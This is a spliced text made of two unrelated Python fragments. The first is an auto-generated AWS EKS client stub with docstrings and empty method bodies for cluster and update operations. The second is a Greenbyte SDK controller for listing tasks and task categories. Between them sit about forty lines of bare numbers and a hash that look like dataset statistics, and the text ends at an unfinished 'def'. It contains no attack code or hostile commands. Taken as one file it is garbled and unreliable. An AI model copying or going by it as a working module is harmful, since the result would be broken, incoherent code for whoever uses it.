cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. - *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The name of the cluster to delete. :rtype: dict :returns: """ pass def describe_cluster(self, name: str) -> Dict: """ Returns descriptive information about an Amazon EKS cluster. The API server endpoint and certificate authority data returned by this operation are required for ``kubelet`` and ``kubectl`` to communicate with your Kubernetes API server. For more information, see `Create a kubeconfig for Amazon EKS <https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html>`__ . .. note:: The API server endpoint and certificate authority data are not available until the cluster reaches the ``ACTIVE`` state. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DescribeCluster>`_ **Request Syntax** :: response = client.describe_cluster( name='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of your specified cluster. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. - *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The name of the cluster to describe. :rtype: dict :returns: """ pass def describe_update(self, name: str, updateId: str) -> Dict: """ Returns descriptive information about an update against your Amazon EKS cluster. When the status of the update is ``Succeeded`` , the update is complete. If an update fails, the status is ``Failed`` , and an error detail explains the reason for the failure. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DescribeUpdate>`_ **Request Syntax** :: response = client.describe_update( name='string', updateId='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* The full description of the specified update. - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type updateId: string :param updateId: **[REQUIRED]** The ID of the update to describe. :rtype: dict :returns: """ pass def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None): """ Generate a presigned url given a client, its method, and arguments :type ClientMethod: string :param ClientMethod: The client method to presign for :type Params: dict :param Params: The parameters normally passed to ``ClientMethod``. :type ExpiresIn: int :param ExpiresIn: The number of seconds the presigned url is valid for. By default it expires in an hour (3600 seconds) :type HttpMethod: string :param HttpMethod: The http method to use on the generated url. By default, the http method is whatever is used in the method\'s model. :returns: The presigned url """ pass def get_paginator(self, operation_name: str = None) -> Paginator: """ Create a paginator for an operation. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is ``create_foo``, and you\'d normally invoke the operation as ``client.create_foo(**kwargs)``, if the ``create_foo`` operation can be paginated, you can use the call ``client.get_paginator(\"create_foo\")``. :raise OperationNotPageableError: Raised if the operation is not pageable. You can use the ``client.can_paginate`` method to check if an operation is pageable. :rtype: L{botocore.paginate.Paginator} :return: A paginator object. """ pass def get_waiter(self, waiter_name: str = None) -> Waiter: """ Returns an object that can wait for some condition. :type waiter_name: str :param waiter_name: The name of the waiter to get. See the waiters section of the service docs for a list of available waiters. :returns: The specified waiter object. :rtype: botocore.waiter.Waiter """ pass def list_clusters(self, maxResults: int = None, nextToken: str = None) -> Dict: """ Lists the Amazon EKS clusters in your AWS account in the specified Region. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/ListClusters>`_ **Request Syntax** :: response = client.list_clusters( maxResults=123, nextToken='string' ) **Response Syntax** :: { 'clusters': [ 'string', ], 'nextToken': 'string' } **Response Structure** - *(dict) --* - **clusters** *(list) --* A list of all of the clusters for your account in the specified Region. - *(string) --* - **nextToken** *(string) --* The ``nextToken`` value to include in a future ``ListClusters`` request. When the results of a ``ListClusters`` request exceed ``maxResults`` , this value can be used to retrieve the next page of results. This value is ``null`` when there are no more results to return. :type maxResults: integer :param maxResults: The maximum number of cluster results returned by ``ListClusters`` in paginated output. When this parameter is used, ``ListClusters`` only returns ``maxResults`` results in a single page along with a ``nextToken`` response element. The remaining results of the initial request can be seen by sending another ``ListClusters`` request with the returned ``nextToken`` value. This value can be between 1 and 100. If this parameter is not used, then ``ListClusters`` returns up to 100 results and a ``nextToken`` value if applicable. :type nextToken: string :param nextToken: The ``nextToken`` value returned from a previous paginated ``ListClusters`` request where ``maxResults`` was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the ``nextToken`` value. .. note:: This token should be treated as an opaque identifier that is only used to retrieve the next items in a list and not for other programmatic purposes. :rtype: dict :returns: """ pass def list_updates(self, name: str, nextToken: str = None, maxResults: int = None) -> Dict: """ Lists the updates associated with an Amazon EKS cluster in your AWS account, in the specified Region. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/ListUpdates>`_ **Request Syntax** :: response = client.list_updates( name='string', nextToken='string', maxResults=123 ) **Response Syntax** :: { 'updateIds': [ 'string', ], 'nextToken': 'string' } **Response Structure** - *(dict) --* - **updateIds** *(list) --* A list of all the updates for the specified cluster and Region. - *(string) --* - **nextToken** *(string) --* The ``nextToken`` value to include in a future ``ListUpdates`` request. When the results of a ``ListUpdates`` request exceed ``maxResults`` , this value can be used to retrieve the next page of results. This value is ``null`` when there are no more results to return. :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster for which to list updates. :type nextToken: string :param nextToken: The ``nextToken`` value returned from a previous paginated ``ListUpdates`` request where ``maxResults`` was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the ``nextToken`` value. :type maxResults: integer :param maxResults: The maximum number of update results returned by ``ListUpdates`` in paginated output. When this parameter is used, ``ListUpdates`` only returns ``maxResults`` results in a single page along with a ``nextToken`` response element. The remaining results of the initial request can be seen by sending another ``ListUpdates`` request with the returned ``nextToken`` value. This value can be between 1 and 100. If this parameter is not used, then ``ListUpdates`` returns up to 100 results and a ``nextToken`` value if applicable. :rtype: dict :returns: """ pass def update_cluster_config(self, name: str, resourcesVpcConfig: Dict = None, logging: Dict = None, clientRequestToken: str = None) -> Dict: """ Updates an Amazon EKS cluster configuration. Your cluster continues to function during the update. The response output includes an update ID that you can use to track the status of your cluster update with the DescribeUpdate API operation. You can use this API operation to enable or disable public and private access to your cluster's Kubernetes API server endpoint. By default, public access is enabled and private access is disabled. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . You can also use this API operation to enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . Cluster updates are asynchronous, and they should finish within a few minutes. During an update, the cluster status moves to ``UPDATING`` (this status transition is eventually consistent). When the update is complete (either ``Failed`` or ``Successful`` ), the cluster status moves to ``Active`` . See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/UpdateClusterConfig>`_ **Request Syntax** :: response = client.update_cluster_config( name='string', resourcesVpcConfig={ 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, logging={ 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, clientRequestToken='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* An object representing an asynchronous update. - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type resourcesVpcConfig: dict :param resourcesVpcConfig: An object representing the VPC configuration to use for an Amazon EKS cluster. - **subnetIds** *(list) --* Specify subnets for your Amazon EKS worker nodes. Amazon EKS creates cross-account elastic network interfaces in these subnets to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **securityGroupIds** *(list) --* Specify one or more security groups for the cross-account elastic network interfaces that Amazon EKS creates to use to allow communication between your worker nodes and the Kubernetes control plane. If you do not specify a security group, the default security group for your VPC is used. - *(string) --* - **endpointPublicAccess** *(boolean) --* Set this value to ``false`` to disable public access for your cluster\'s Kubernetes API server endpoint. If you disable public access, your cluster\'s Kubernetes API server can only receive requests from within the cluster VPC. The default value for this parameter is ``true`` , which enables public access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . - **endpointPrivateAccess** *(boolean) --* Set this value to ``true`` to enable private access for your cluster\'s Kubernetes API server endpoint. If you enable private access, Kubernetes API requests from within your cluster\'s VPC will use the private VPC endpoint. The default value for this parameter is ``false`` , which disables private access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . :type logging: dict :param logging: Enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass def update_cluster_version(self, name: str, version: str, clientRequestToken: str = None) -> Dict: """ Updates an Amazon EKS cluster to the specified Kubernetes version. Your cluster continues to function during the update. The response output includes an update ID that you can use to track the status of your cluster update with the DescribeUpdate API operation. Cluster updates are asynchronous, and they should finish within a few minutes. During an update, the cluster status moves to ``UPDATING`` (this status transition is eventually consistent). When the update is complete (either ``Failed`` or ``Successful`` ), the cluster status moves to ``Active`` . See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/UpdateClusterVersion>`_ **Request Syntax** :: response = client.update_cluster_version( name='string', version='string', clientRequestToken='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* The full description of the specified update - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type version: string :param version: **[REQUIRED]** The desired Kubernetes version following a successful update. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass
63.775882
600
0.574645
5,840
56,059
5.495719
0.083562
0.022994
0.014956
0.019068
0.848668
0.831251
0.820284
0.814083
0.796479
0.789874
0
0.003627
0.335985
56,059
878
601
63.848519
0.858586
0.852976
0
0.387097
0
0
0
0
0
0
0
0
0
1
0.387097
false
0.387097
0.193548
0
0.612903
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
10
abcba8037385e07a2e1020d85b037b0678cdeccf
160
py
Python
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
58
2021-11-11T09:47:02.000Z
2022-03-27T20:13:08.000Z
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
30
2021-10-30T10:31:38.000Z
2022-03-28T14:12:08.000Z
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
12
2021-11-17T10:59:20.000Z
2022-03-18T07:34:02.000Z
from .lqr_policy import * from .split_riccati_factorization import * from .split_constrained_riccati_factorization import * from .riccati_factorization import *
40
54
0.85625
19
160
6.842105
0.421053
0.230769
0.6
0.461538
0
0
0
0
0
0
0
0
0.09375
160
4
55
40
0.896552
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
abd5bf81e6f0a296bf70040d75857be75c385c71
45,897
py
Python
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ greenbyteapi This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ). """ from greenbyteapi.api_helper import APIHelper from greenbyteapi.configuration import Configuration from greenbyteapi.controllers.base_controller import BaseController from greenbyteapi.http.auth.custom_header_auth import CustomHeaderAuth from greenbyteapi.models.task import Task from greenbyteapi.models.task_category import TaskCategory from greenbyteapi.models.task_comment import TaskComment from greenbyteapi.models.tasks_files_response import TasksFilesResponse from greenbyteapi.models.downtime_event import DowntimeEvent from greenbyteapi.models.site_access import SiteAccess from greenbyteapi.models.device_access import DeviceAccess from greenbyteapi.models.organization import Organization from greenbyteapi.models.personnel import Personnel from greenbyteapi.exceptions.problem_details_exception import ProblemDetailsException from greenbyteapi.exceptions.api_exception import APIException class PlanController(BaseController): """A Controller to access Endpoints in the greenbyteapi API.""" def list_tasks(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, category_ids=None, state=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks. **(BETA)** Gets a list of tasks. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for (exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get tasks for. site_ids (list of int, optional): What sites to get tasks for. category_ids (list of int, optional): What task categories to include. state (TaskStateEnum, optional): What state of tasks to get: resolved and unresolved. If not set, both resolved and unresolved tasks are included. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `Task` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of Task: Response from the API. A list of tasks matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'categoryIds': category_ids, 'state': state, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Task.from_dictionary) def list_task_categories(self): """Does a GET request to /task-categories. **(BETA)** Gets a list of task categories. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Returns: list of TaskCategory: Response from the API. A list of task categories. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/task-categories' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TaskCategory.from_dictionary) def 